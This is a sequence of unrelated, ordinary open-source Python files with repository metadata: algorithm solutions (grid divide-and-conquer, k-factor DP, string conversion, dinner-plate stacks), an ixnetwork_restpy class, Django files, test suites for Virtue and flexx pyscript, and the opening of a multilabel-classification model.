                divide_and_conquer(x, y+n//2, n//2)
                divide_and_conquer(x+n//2, y, n//2)
                divide_and_conquer(x+n//2, y+n//2, n//2)
                return
    if is_same == 0:
        white += 1
        return
    else:
        blue += 1
        return


divide_and_conquer(0, 0, N)
print(white)
print(blue)
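
# --- Illustrative example (not part of the original solution) ---
# BOJ 2630 input is N followed by an N x N grid of 0 (white) / 1 (blue);
# the input below is a made-up example. For
#     2
#     0 0
#     1 1
# the first call finds mixed colors, recurses into four 1x1 quadrants, and
# the program prints 2 (white squares) then 2 (blue squares).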
bd8b148f92a01f3fbc82dd1d176eb21419eb739c
1ee3dc4fa096d12e409af3a298ba01f5558c62b5
/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/lisp/router/interface/interface.py
192dc57cbe8c8a41394c66c0c94aa4999411d605
[ "MIT" ]
permissive
parthpower/ixnetwork_restpy
321e64a87be0a4d990276d26f43aca9cf4d43cc9
73fa29796a5178c707ee4e21d90ff4dad31cc1ed
refs/heads/master
2020-07-04T13:34:42.162458
2019-08-13T20:33:17
2019-08-13T20:33:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,623
py
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files


class Interface(Base):
    """The Interface class encapsulates a user managed interface node in the ixnetwork hierarchy.

    An instance of the class can be obtained by accessing the Interface property from a parent instance.
    The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
    The internal properties list can be managed by the user by using the add and remove methods.
    """

    _SDM_NAME = 'interface'

    def __init__(self, parent):
        super(Interface, self).__init__(parent)

    @property
    def Enabled(self):
        """If True, it gives details about the interface

        Returns:
            bool
        """
        return self._get_attribute('enabled')
    @Enabled.setter
    def Enabled(self, value):
        self._set_attribute('enabled', value)

    @property
    def MapRegisterOrRequestTxInterface(self):
        """If true, it maps register or requests Tx interface

        Returns:
            bool
        """
        return self._get_attribute('mapRegisterOrRequestTxInterface')
    @MapRegisterOrRequestTxInterface.setter
    def MapRegisterOrRequestTxInterface(self, value):
        self._set_attribute('mapRegisterOrRequestTxInterface', value)

    @property
    def ProtocolInterfaces(self):
        """It gives the protocol interfaces

        Returns:
            str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)
        """
        return self._get_attribute('protocolInterfaces')
    @ProtocolInterfaces.setter
    def ProtocolInterfaces(self, value):
        self._set_attribute('protocolInterfaces', value)

    def update(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Updates a child instance of interface on the server.

        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        self._update(locals())

    def add(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Adds a new interface node on the server and retrieves it in this instance.

        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces

        Returns:
            self: This instance with all currently retrieved interface data using find and the newly added interface data available through an iterator or index

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._create(locals())

    def remove(self):
        """Deletes all the interface data in this instance from server.

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()

    def find(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Finds and retrieves interface data from the server.

        All named parameters support regex and can be used to selectively retrieve interface data from the server.
        By default the find method takes no parameters and will retrieve all interface data from the server.

        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces

        Returns:
            self: This instance with matching interface data retrieved from the server available through an iterator or index

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(locals())

    def read(self, href):
        """Retrieves a single instance of interface data from the server.

        Args:
            href (str): An href to the instance to be retrieved

        Returns:
            self: This instance with the interface data from the server available through an iterator or index

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
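
# --- Illustrative usage (not part of the original file) ---
# A rough sketch of the add/find pattern this class exposes. The session
# setup and the `router` parent object below are assumptions inferred from
# the module path (vport/protocols/lisp/router/interface), not verified API.
#
#     interface = router.Interface.add(Enabled=True)   # create on the server
#     matches = router.Interface.find(Enabled=True)    # regex-capable lookup
#     matches.remove()                                 # delete matching nodes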
fe2c3f21e8f912cf8f5a8ca36246b60fd5ffd52d
8afb5afd38548c631f6f9536846039ef6cb297b9
/_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/dp/k_factor.py
2fd23d18b2bb743e169249ad0c1b6c4a54e94f4d
[ "MIT" ]
permissive
bgoonz/UsefulResourceRepo2.0
d87588ffd668bb498f7787b896cc7b20d83ce0ad
2cb4b45dd14a230aa0e800042e893f8dfb23beda
refs/heads/master
2023-03-17T01:22:05.254751
2022-08-11T03:18:22
2022-08-11T03:18:22
382,628,698
10
12
MIT
2022-10-10T14:13:54
2021-07-03T13:58:52
null
UTF-8
Python
false
false
2,425
py
'''The K factor of a string is defined as the number of times 'abba' appears
as a substring. Given two numbers N and k, find the number of strings of
length N with 'K factor' = k.

The algorithm is as follows:
dp[n][k] will be a 4 element array, wherein each element can be the number of
strings of length n and 'K factor' = k which belong to the criteria
represented by that index:

    dp[n][k][0] can be the number of strings of length n and K-factor = k which end with substring 'a'
    dp[n][k][1] can be the number of strings of length n and K-factor = k which end with substring 'ab'
    dp[n][k][2] can be the number of strings of length n and K-factor = k which end with substring 'abb'
    dp[n][k][3] can be the number of strings of length n and K-factor = k which end with anything other than the above substrings (anything other than 'a' 'ab' 'abb')

Example inputs
n=4 k=1  no of strings = 1
n=7 k=1  no of strings = 70302
n=10 k=2 no of strings = 74357
'''

def find_k_factor(n, k):
    dp = [[[0 for i in range(4)] for j in range((n-1)//3+2)] for k in range(n+1)]
    if 3*k+1 > n:
        return 0
    # base cases
    dp[1][0][0] = 1
    dp[1][0][1] = 0
    dp[1][0][2] = 0
    dp[1][0][3] = 25
    for i in range(2, n+1):
        for j in range((n-1)//3+2):
            if j == 0:
                # adding a at the end
                dp[i][j][0] = dp[i-1][j][0] + dp[i-1][j][1] + dp[i-1][j][3]
                # adding b at the end
                dp[i][j][1] = dp[i-1][j][0]
                dp[i][j][2] = dp[i-1][j][1]
                # adding any other lowercase character
                dp[i][j][3] = dp[i-1][j][0]*24 + dp[i-1][j][1]*24 + dp[i-1][j][2]*25 + dp[i-1][j][3]*25
            elif 3*j+1 < i:
                # adding a at the end
                dp[i][j][0] = dp[i-1][j][0] + dp[i-1][j][1] + dp[i-1][j][3] + dp[i-1][j-1][2]
                # adding b at the end
                dp[i][j][1] = dp[i-1][j][0]
                dp[i][j][2] = dp[i-1][j][1]
                # adding any other lowercase character
                dp[i][j][3] = dp[i-1][j][0]*24 + dp[i-1][j][1]*24 + dp[i-1][j][2]*25 + dp[i-1][j][3]*25
            elif 3*j+1 == i:
                dp[i][j][0] = 1
                dp[i][j][1] = 0
                dp[i][j][2] = 0
                dp[i][j][3] = 0
            else:
                dp[i][j][0] = 0
                dp[i][j][1] = 0
                dp[i][j][2] = 0
                dp[i][j][3] = 0
    return sum(dp[n][k])
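
# --- Illustrative check (not part of the original file) ---
# The expected values come from the "Example inputs" in the docstring above.
if __name__ == '__main__':
    print(find_k_factor(4, 1))    # 1
    print(find_k_factor(7, 1))    # 70302
    print(find_k_factor(10, 2))   # 74357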
fa6e881a5133e9f6c1dfb1eb79caf0e14010ad6d
a202382af2f80aea6bc0741b5610da3c1864a5a2
/backend/manage.py
8d773fd969422b7458a1713c1373701e6ca064d0
[]
no_license
crowdbotics-apps/tga-life-27929
e061896c9d5e5152742e286a5da312e489eeb988
f3e0d65ccbd7d423fde7bb18c5bce5f9c9e3a621
refs/heads/master
2023-05-20T23:58:35.370581
2021-06-11T22:53:49
2021-06-11T22:53:49
376,158,777
0
0
null
null
null
null
UTF-8
Python
false
false
634
py
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys


def main():
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tga_life_27929.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
2c8a4afae4e6ee567b7e3a9f144ac308b111fb97
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
/Python/string-transforms-into-another-string.py
d35a88782051531b15b00f944f7d80139f42e635
[ "MIT" ]
permissive
kamyu104/LeetCode-Solutions
f54822059405ef4df737d2e9898b024f051fd525
4dc4e6642dc92f1983c13564cc0fd99917cab358
refs/heads/master
2023-09-02T13:48:26.830566
2023-08-28T10:11:12
2023-08-28T10:11:12
152,631,182
4,549
1,651
MIT
2023-05-31T06:10:33
2018-10-11T17:38:35
C++
UTF-8
Python
false
false
429
py
# Time:  O(n)
# Space: O(1)

import itertools


class Solution(object):
    def canConvert(self, str1, str2):
        """
        :type str1: str
        :type str2: str
        :rtype: bool
        """
        if str1 == str2:
            return True
        lookup = {}
        for i, j in itertools.izip(str1, str2):
            if lookup.setdefault(i, j) != j:
                return False
        return len(set(str2)) < 26
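
# --- Illustrative usage (not part of the original file) ---
# Python 2 is assumed, since the solution above uses itertools.izip.
# Each character of str1 must map consistently to one character of str2,
# and a spare letter (< 26 distinct characters in str2) is needed so that
# mapping cycles can be broken via a temporary character.
if __name__ == "__main__":
    print(Solution().canConvert("aabcc", "ccdee"))        # True (a->c, b->d, c->e)
    print(Solution().canConvert("leetcode", "codeleet"))  # False ('e' maps inconsistently)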
00d5d5a9c614ab732e8c77cad1adba67326c87e1
ee37f65ed9fcfeb01c9de6f1974ca2e81e940e6e
/virtue/tests/test_cli.py
40ef95310118af49405956eb68f8611493a5b45f
[ "MIT" ]
permissive
iCodeIN/Virtue
0d374563fdd117e0f46e9b5af9da0227118cba4a
e01963c66530d4ef8d43e0191718d123b37edab7
refs/heads/main
2023-03-14T23:19:08.722541
2020-09-12T18:00:24
2020-09-12T18:00:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,492
py
from unittest import TestCase
import os

from twisted.trial.reporter import TreeReporter

from virtue import _cli


def DumbReporter():
    return 12


class TestParser(TestCase):
    def parse_args(self, argv):
        return _cli.main.make_context("virtue", argv).params

    def test_it_parses_out_tests(self):
        arguments = self.parse_args(["foo", "bar", "baz"])
        self.assertEqual(list(arguments["tests"]), ["foo", "bar", "baz"])

    def test_it_retrieves_built_in_reporters_by_name(self):
        arguments = self.parse_args(["--reporter", "tree", "foo"])
        self.assertIsInstance(arguments["reporter"], TreeReporter)

    def test_it_retrieves_other_reporters_by_fully_qualified_name(self):
        arguments = self.parse_args(
            ["--reporter", "virtue.tests.test_cli.DumbReporter", "abc"],
        )
        self.assertEqual(arguments["reporter"], DumbReporter())

    def test_stop_after(self):
        arguments = self.parse_args(["-xxx", "bar", "baz"])
        self.assertEqual(
            (arguments["stop_after"], list(arguments["tests"])),
            (3, ["bar", "baz"]),
        )

    def test_stop_after_default(self):
        arguments = self.parse_args(["-x", "bar", "baz"])
        self.assertEqual(
            (arguments["stop_after"], list(arguments["tests"])),
            (1, ["bar", "baz"]),
        )


class TestMain(TestCase):
    # TODO: these write to stdout
    def test_it_exits_successfully_for_successful_runs(self):
        with self.assertRaises(SystemExit) as e:
            _cli.main(
                [
                    "--reporter", "summary",
                    "virtue.tests.samples.one_successful_test",
                ],
            )
        self.assertEqual(e.exception.code, os.EX_OK)

    def test_it_exits_unsuccessfully_for_unsuccessful_runs(self):
        with self.assertRaises(SystemExit) as e:
            _cli.main(
                [
                    "--reporter", "text",
                    "virtue.tests.samples.one_unsuccessful_test",
                ],
            )
        self.assertNotEqual(e.exception.code, os.EX_OK)

    def test_it_exits_unsuccessfully_for_unknown_reporters(self):
        with self.assertRaises(SystemExit) as e:
            _cli.main(
                [
                    "--reporter", "non-existent reporter",
                    "virtue.tests.samples.one_unsuccessful_test",
                ],
            )
        self.assertNotEqual(e.exception.code, os.EX_OK)
d908c0fcab2dbbeb25c9f1cb410394fcd924c68a
6cde9523f08d2a89be689d045721c4ad43173e33
/flexx/pyscript/tests/test_parser1.py
9df96afd9de0c98c75c89366e88094d18a25669c
[ "BSD-2-Clause" ]
permissive
priestd09/flexx
16e203031d97ec14ed276de83d82b72934761ae2
47df75d957db03e2692c3cdd09eb66b385cb104a
refs/heads/master
2021-01-22T13:12:41.935353
2015-07-04T15:04:21
2015-07-04T15:04:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,980
py
from pytest import raises

from flexx.util.testing import run_tests_if_main

from flexx.pyscript import JSError, py2js, evaljs, evalpy, Parser
from flexx import pyscript


def nowhitespace(s):
    return s.replace('\n', '').replace('\t', '').replace(' ', '')


class TestParser(Parser):

    def function_foo_foo(self, node):
        return 'xxx'

    def method_bar_bar(self, node, base):
        return base


class TestTheParser:

    def test_special_functions(self):
        assert TestParser("foo_foo()").dump() == 'xxx;'
        assert TestParser("bar_bar()").dump() == 'bar_bar();'

        assert TestParser("xxx.bar_bar()").dump() == 'xxx;'
        assert TestParser("xxx.foo_foo()").dump() == 'xxx.foo_foo();'

    def test_exceptions(self):
        raises(JSError, py2js, "foo(**kwargs)")


class TestExpressions:
    """ Tests for single-line statements/expressions """

    def test_special(self):
        assert py2js('') == ''
        assert py2js(' \n') == ''

    def test_ops(self):
        # Test code
        assert py2js('2+3') == '2 + 3;'  # Binary
        assert py2js('2/3') == '2 / 3;'
        assert py2js('not 2') == '!2;'  # Unary
        assert py2js('-(2+3)') == '-(2 + 3);'
        assert py2js('True and False') == 'true && false;'  # Boolean

        # No parentheses around names, numbers and strings
        assert py2js('foo + bar') == "foo + bar;"
        assert py2js('_foo3 + _bar4') == "_foo3 + _bar4;"
        assert py2js('3 + 4') == "3 + 4;"
        assert py2js('"abc" + "def"') == "'abc' + 'def';"
        assert py2js("'abc' + 'def'") == "'abc' + 'def';"
        assert py2js("'abc' + \"'def\"") == "'abc' + \"'def\";"

        # But they should be if it gets more complex
        assert py2js('foo + bar == 3') == "(foo + bar) == 3;"

        # Test outcome
        assert evalpy('2+3') == '5'  # Binary
        assert evalpy('6/3') == '2'
        assert evalpy('4//3') == '1'
        assert evalpy('2**8') == '256'
        assert evalpy('not True') == 'false'  # Unary
        assert evalpy('- 3') == '-3'
        assert evalpy('True and False') == 'false'  # Boolean
        assert evalpy('True or False') == 'true'

        # string formatting
        assert evalpy('"%s" % "bar"') == 'bar'
        assert evalpy('"-%s-" % "bar"') == '-bar-'
        assert evalpy('"foo %s foo" % "bar"') == 'foo bar foo'
        assert evalpy('"x %i" % 6') == 'x 6'
        assert evalpy('"x %f" % 6') == 'x 6'
        assert evalpy('"%s: %f" % ("value", 6)') == 'value: 6'

    def test_comparisons(self):
        assert py2js('4 > 3') == '4 > 3;'
        assert py2js('4 is 3') == '4 === 3;'

        assert evalpy('4 > 4') == 'false'
        assert evalpy('4 >= 4') == 'true'
        assert evalpy('4 < 3') == 'false'
        assert evalpy('4 <= 4') == 'true'
        assert evalpy('4 == 3') == 'false'
        assert evalpy('4 != 3') == 'true'

        assert evalpy('4 == "4"') == 'true'  # yuck!
        assert evalpy('4 is "4"') == 'false'
        assert evalpy('4 is not "4"') == 'true'

        assert evalpy('"c" in "abcd"') == 'true'
        assert evalpy('"x" in "abcd"') == 'false'
        assert evalpy('"x" not in "abcd"') == 'true'

        assert evalpy('3 in [1,2,3,4]') == 'true'
        assert evalpy('9 in [1,2,3,4]') == 'false'
        assert evalpy('9 not in [1,2,3,4]') == 'true'

        assert evalpy('"bar" in {"foo": 3}') == 'false'
        assert evalpy('"foo" in {"foo": 3}') == 'true'

    def test_truthfulness_of_basic_types(self):
        # Numbers
        assert evalpy('"T" if (1) else "F"') == 'T'
        assert evalpy('"T" if (0) else "F"') == 'F'

        # Strings
        assert evalpy('"T" if ("a") else "F"') == 'T'
        assert evalpy('"T" if ("") else "F"') == 'F'

        # Arrays - yuk!
        assert evalpy('"T" if ([1, 2, 3]) else "F"') == 'T'
        assert evalpy('"T" if ([]) else "F"') == 'T'

        # Dicts - yuk!
        assert evalpy('"T" if ({"foo": 3}) else "F"') == 'T'
        assert evalpy('"T" if ({}) else "F"') == 'T'

        # None - undefined
        assert evalpy('None is null') == 'true'
        assert evalpy('None is undefined') == 'false'
        assert evalpy('undefined is undefined') == 'true'

    def test_indexing_and_slicing(self):
        c = 'a = [1, 2, 3, 4, 5]\n'

        # Indexing
        assert evalpy(c + 'a[2]') == '3'
        assert evalpy(c + 'a[-2]') == '4'

        # Slicing
        assert evalpy(c + 'a[:]') == '[ 1, 2, 3, 4, 5 ]'
        assert evalpy(c + 'a[1:-1]') == '[ 2, 3, 4 ]'

    def test_assignments(self):
        assert py2js('foo = 3') == 'var foo;\nfoo = 3;'  # with var
        assert py2js('foo.bar = 3') == 'foo.bar = 3;'  # without var

        code = py2js('foo = 3; bar = 4')  # define both
        assert code.count('var') == 1
        code = py2js('foo = 3; foo = 4')  # only define first time
        assert code.count('var') == 1

        code = py2js('foo = bar = 3')  # multiple assignment
        assert 'foo = bar = 3' in code
        assert 'var bar, foo' in code  # alphabetic order

        # self -> this
        assert py2js('self') == 'this;'
        assert py2js('self.foo') == 'this.foo;'

        # Indexing
        assert evalpy('a=[0,0]\na[0]=2\na[1]=3\na', False) == '[2,3]'

        # Tuple unpacking
        evalpy('x=[1,2,3]\na, b, c = x\nb', False) == '2'
        evalpy('a,b,c = [1,2,3]\nc,b,a = a,b,c\n[a,b,c]', False) == '[3,2,1]'

        # Class variables don't get a var
        code = py2js('class Foo:\n  bar=3\n  bar = bar + 1')
        assert code.count('bar') == 3
        assert code.count('Foo.prototype.bar') == 3

    def test_aug_assignments(self):
        # assign + bin op
        assert evalpy('x=5; x+=1; x') == '6'
        assert evalpy('x=5; x/=2; x') == '2.5'
        assert evalpy('x=5; x**=2; x') == '25'
        assert evalpy('x=5; x//=2; x') == '2'

    def test_basic_types(self):
        assert py2js('True') == 'true;'
        assert py2js('False') == 'false;'
        assert py2js('None') == 'null;'

        assert py2js('"bla\\"bla"') == "'bla\"bla';"
        assert py2js('3') == '3;'
        assert py2js('3.1415') == '3.1415;'

        assert py2js('[1,2,3]') == '[1, 2, 3];'
        assert py2js('(1,2,3)') == '[1, 2, 3];'
        assert py2js('{foo: 3, bar: 4}') == '{foo: 3, bar: 4};'

    def test_ignore_import_of_compiler(self):
        modname = pyscript.__name__
        assert py2js('from %s import x, y, z\n42' % modname) == '42;'

    def test_funcion_call(self):
        jscode = 'var foo = function (x, y) {return x+y;};'
        assert evaljs(jscode + py2js('foo(2,2)')) == '4'
        assert evaljs(jscode + py2js('foo("so ", True)')) == 'so true'
        assert evaljs(jscode + py2js('a=[1,2]; foo(*a)')) == '3'

        # Test super (is tested for real in test_parser3.py)
        assert evalpy('d={"_base_class": console};d._base_class.log(4)') == '4'
        assert evalpy('d={"_base_class": console};d._base_class.log()') == ''

        jscode = 'var foo = function () {return this.val};'
        jscode += 'var d = {"foo": foo, "val": 7};\n'
        assert evaljs(jscode + py2js('d["foo"]()')) == '7'
        assert evaljs(jscode + py2js('d["foo"](*[3, 4])')) == '7'

    def test_instantiation(self):
        # Test creating instances
        assert 'new' in py2js('a = Foo()')
        assert 'new' in py2js('a = x.Foo()')
        assert 'new' not in py2js('a = foo()')
        assert 'new' not in py2js('a = _foo()')
        assert 'new' not in py2js('a = _Foo()')
        assert 'new' not in py2js('a = this.Foo()')
        assert 'new' not in py2js('a = JSON.stringify(x)')

        jscode = 'function Foo() {this.x = 3}\nx=1;\n'
        assert evaljs(jscode + py2js('a=Foo()\nx')) == '1'

    def test_pass(self):
        assert py2js('pass') == ''

    def test_delete(self):
        assert evalpy('d={}\nd.foo=3\n\nd') == "{ foo: 3 }"
        assert evalpy('d={}\nd.foo=3\ndel d.foo\nd') == '{}'
        assert evalpy('d={}\nd.foo=3\nd.bar=3\ndel d.foo\nd') == '{ bar: 3 }'
        assert evalpy('d={}\nd.foo=3\nd.bar=3\ndel d.foo, d["bar"]\nd') == '{}'


class TestModules:

    def test_module(self):
        code = Parser('"docstring"\nfoo=3;bar=4;_priv=0;', 'mymodule').dump()

        # Has docstring
        assert code.count('// docstring') == 1

        # Test that global variables exist
        assert evaljs(code+'mymodule.foo+mymodule.bar') == '7'

        # And privates do not
        assert evaljs(code+'mymodule._priv===undefined') == 'true'


run_tests_if_main()

# if __name__ == '__main__':
#     t = TestClasses()
#     t.test_class()
#     t.test_inheritance()
1c640d2fa43898ace5b37376c3acb4cbf03661f2
e16d7d8f60145c68640b25aa7c259618be60d855
/django_by_example/code/Chapter 6/bookmarks/images/migrations/0002_image_total_likes.py
323c49fd95ca00d51cdaf4961e35bfd308dabf1d
[]
no_license
zongqiqi/mypython
bbe212223002dabef773ee0dbeafbad5986b4639
b80f3ce6c30a0677869a7b49421a757c16035178
refs/heads/master
2020-04-21T07:39:59.594233
2017-12-11T00:54:44
2017-12-11T00:54:44
98,426,286
2
0
null
null
null
null
UTF-8
Python
false
false
461
py
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-08 06:24
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('images', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='image',
            name='total_likes',
            field=models.PositiveIntegerField(db_index=True, default=0),
        ),
    ]
48dcd7160b1610706b8ecc0b420bf892c26bb623
f6f632bee57875e76e1a2aa713fdbe9f25e18d66
/python/_1001_1500/1172_dinner-plate-stacks.py
c97488c27269fb1eb844a70f14dafd25248ae8de
[]
no_license
Wang-Yann/LeetCodeMe
b50ee60beeeb3661869bb948bef4fbe21fc6d904
44765a7d89423b7ec2c159f70b1a6f6e446523c2
refs/heads/master
2023-08-07T05:31:23.428240
2021-09-30T15:33:53
2021-09-30T15:33:53
253,497,185
0
0
null
null
null
null
UTF-8
Python
false
false
8,429
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : Rock Wayne
# @Created : 2020-07-02 08:00:00
# @Last Modified : 2020-07-02 08:00:00
# @Mail    : [email protected]
# @Version : alpha-1.0

"""
# We line up an infinite number of stacks from left to right, numbered from 0.
# Every stack has the same maximum capacity `capacity`.
#
# Implement a class called DinnerPlates ("dinner plate stacks"):
#
#   DinnerPlates(int capacity) - sets the maximum capacity of each stack.
#   void push(int val)         - pushes the given positive integer val onto the
#                                leftmost stack that is not yet full.
#   int pop()                  - returns the value at the top of the rightmost
#                                non-empty stack and removes it; returns -1 if
#                                all stacks are empty.
#   int popAtStack(int index)  - returns the value at the top of the stack with
#                                the given index and removes it; returns -1 if
#                                that stack is empty.
#
# Example:
#
# Input:
# ["DinnerPlates","push","push","push","push","push","popAtStack","push","push",
# "popAtStack","popAtStack","pop","pop","pop","pop","pop"]
# [[2],[1],[2],[3],[4],[5],[0],[20],[21],[0],[2],[],[],[],[],[]]
# Output:
# [null,null,null,null,null,null,2,null,null,20,21,5,4,3,1,-1]
#
# Explanation:
# DinnerPlates D = DinnerPlates(2);  // initialize, stack capacity = 2
# D.push(1); D.push(2); D.push(3); D.push(4); D.push(5);
#                     // stacks: 2  4
#                     //         1  3  5
# D.popAtStack(0);    // returns 2;  stacks: 4           / 1  3  5
# D.push(20);         // stacks: 20 4       / 1  3  5
# D.push(21);         // stacks: 20 4  21   / 1  3  5
# D.popAtStack(0);    // returns 20; stacks: 4  21       / 1  3  5
# D.popAtStack(2);    // returns 21; stacks: 4           / 1  3  5
# D.pop()             // returns 5;  stacks: 4           / 1  3
# D.pop()             // returns 4;  stacks: 1  3
# D.pop()             // returns 3;  stacks: 1
# D.pop()             // returns 1;  no stacks left.
# D.pop()             // returns -1; still no stacks.
#
# Constraints:
#   1 <= capacity <= 20000
#   1 <= val <= 20000
#   0 <= index <= 100000
#   At most 200000 calls to push, pop, and popAtStack.
#
# Related Topics: Design
"""
import heapq

import pytest


# leetcode submit region begin(Prohibit modification and deletion)
class DinnerPlates:
    """
    GOOD HARD
    Use a heap queue q to find the leftmost available stack.
    https://leetcode.com/problems/dinner-plate-stacks/discuss/366331/C%2B%2BPython-Two-Solutions
    """

    def __init__(self, capacity: int):
        self.capacity = capacity
        # record the available stacks; the heap quickly finds the smallest available index
        # (if you are a Java or C++ user, a tree map is another good option)
        self.q = []
        # record values of all stacks of plates; the last nonempty stack is the rightmost one
        self.stacks = []

    def push(self, val: int) -> None:
        # To push, we need to find the leftmost available position.
        # First, remove any stacks on the left that are full:
        # 1) self.q: there is still an available stack to insert a plate into
        # 2) self.q[0] < len(self.stacks): the leftmost available index self.q[0] is smaller than the current size of the stacks
        # 3) len(self.stacks[self.q[0]]) == self.capacity: the stack has reached full capacity
        while self.q and self.q[0] < len(self.stacks) and len(self.stacks[self.q[0]]) == self.capacity:
            # we remove the filled stack from the queue of available stacks
            heapq.heappop(self.q)
        # now we reach the leftmost available stack to insert
        # if the q is empty, meaning there are no more available stacks
        if not self.q:
            # open up a new stack to insert
            heapq.heappush(self.q, len(self.stacks))
        # for the newly added stack, add a new stack to self.stacks accordingly
        if self.q[0] == len(self.stacks):
            self.stacks.append([])
        # append the value to the leftmost available stack
        self.stacks[self.q[0]].append(val)

    def pop(self) -> int:
        # To pop, we need to find the rightmost nonempty stack:
        # 1) stacks is not empty (self.stacks) and
        # 2) the last stack is empty
        while self.stacks and not self.stacks[-1]:
            # we throw away the last empty stack, because we can't pop from it
            self.stacks.pop()
        # now we reach the rightmost nonempty stack;
        # we pop the plate from the last nonempty stack of self.stacks by using the popAtStack function
        return self.popAtStack(len(self.stacks) - 1)

    def popAtStack(self, index: int) -> int:
        # To pop from a stack of given index, we need to make sure that it is not empty:
        # 1) the index for inserting is valid and,
        # 2) the stack of interest is not empty
        if 0 <= index < len(self.stacks) and self.stacks[index]:
            # we add the index back into the heap of available stacks
            heapq.heappush(self.q, index)
            # take the top plate, pop it and return its value
            return self.stacks[index].pop()
        # otherwise, return -1 because we can't pop any plate
        return -1


# Your DinnerPlates object will be instantiated and called as such:
# obj = DinnerPlates(capacity)
# obj.push(val)
# param_2 = obj.pop()
# param_3 = obj.popAtStack(index)
# leetcode submit region end(Prohibit modification and deletion)


def test_solution():
    D = DinnerPlates(2)  # initialize, stack capacity = 2
    D.push(1)
    D.push(2)
    D.push(3)
    D.push(4)
    D.push(5)
    # stacks: 2  4
    #         1  3  5
    assert D.popAtStack(0) == 2
    # stacks: 4
    #         1  3  5
    D.push(20)
    # stacks: 20 4
    #         1  3  5
    D.push(21)
    # stacks: 20 4  21
    #         1  3  5
    assert D.popAtStack(0) == 20
    # stacks: 4  21
    #         1  3  5
    assert D.popAtStack(2) == 21
    # stacks: 4
    #         1  3  5
    assert D.pop() == 5
    # stacks: 4
    #         1  3
    assert D.pop() == 4
    # stacks: 1  3
    assert D.pop() == 3
    # stacks: 1
    assert D.pop() == 1
    # no stacks left
    assert D.pop() == -1
    # still no stacks


if __name__ == '__main__':
    pytest.main(["-q", "--color=yes", "--capture=no", __file__])
8ff81c1069b16514fe71f425f113994814800221
89a19b7ba268fb45f0dd5ec0fe2046ffb2d7b8e0
/model/src/__main__.py
7972fb3a6e2dd66ca543b3de57571ddc228b7982
[]
no_license
docdok/C2AE-Multilabel-Classification
dcd3ebe5192420258fa265f00e66226efe761dc9
510f164bf60f8a93c527044e02edc0ce2285f322
refs/heads/master
2021-01-16T19:30:15.973602
2017-08-01T17:45:12
2017-08-01T17:45:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
10,638
py
import os
import sys
import time

import utils
import numpy as np
import tensorflow as tf

from parser import Parser
from config import Config
from network import Network
from dataset import DataSet
from eval_performance import evaluate, patk

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'


class Model(object):
    def __init__(self, config):
        self.epoch_count = 0
        self.config = config
        self.data = DataSet(config)
        self.add_placeholders()
        self.summarizer = tf.summary
        self.net = Network(config, self.summarizer)
        self.optimizer = self.config.solver.optimizer
        self.y_pred = self.net.prediction(self.x, self.keep_prob)
        self.loss = self.net.loss(self.x, self.y, self.keep_prob)
